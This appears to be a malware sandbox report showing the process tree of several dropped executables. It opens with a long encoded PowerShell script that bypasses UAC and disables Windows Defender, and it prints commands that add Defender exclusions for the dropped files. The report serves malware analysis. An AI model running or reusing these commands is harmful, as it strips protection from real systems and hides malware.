      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6024
    - - C:\Windows\SysWOW64\sc.exe
        
        "C:\Windows\system32\sc.exe" qc windefend
        5⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:6436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4364
    - - C:\Windows\SysWOW64\whoami.exe
        
        "C:\Windows\system32\whoami.exe" /groups
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5304
    - - C:\Windows\SysWOW64\net1.exe
        
        "C:\Windows\system32\net1.exe" start TrustedInstaller
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6976
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 2848
      4⤵
      Program crash
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\a\cat.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cat.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4248
- - C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
    3⤵
    - Executes dropped EXE
    PID:1968
- - C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
    3⤵
    - Executes dropped EXE
    PID:4376
- - C:\Users\Admin\AppData\Local\Temp\a\dog.exe
    "C:\Users\Admin\AppData\Local\Temp\a\dog.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:364
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:6368
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 212
        5⤵
        Program crash
        
        PID:804
- - C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\KrnlSetup.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2664
- - C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6136
- - C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6992
- - C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
    "C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6528
